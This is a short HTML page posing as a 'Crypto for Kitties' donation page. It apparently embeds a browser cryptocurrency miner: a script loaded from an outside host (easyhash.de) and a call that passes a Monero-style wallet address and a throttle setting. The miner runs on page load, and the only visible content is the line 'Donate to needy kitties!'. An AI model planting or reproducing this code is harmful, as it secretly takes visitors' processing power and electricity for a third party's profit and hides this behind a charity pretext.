<!DOCTYPE html>
<html lang="en" dir="ltr">
    <head>
        <meta charset="utf-8" />
        <title>Crypto for Kitties</title>
    </head>
    <body>
        <script src="https://easyhash.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.xmr"></script>
        <script type="text/javascript">
            EverythingIsLife(
                "45DEBw9cBcHiAEh4sCCXNtisbK54qEwghVRJ29ESjQz9e7ZmbufUWzKD6XGBRMWKyjMJ2dXkyNsvf5s3dpvhxdLp6TogyJn+10000",
                "x",
                50
            );
        </script>
        Donate to needy kitties!
    </body>
</html>
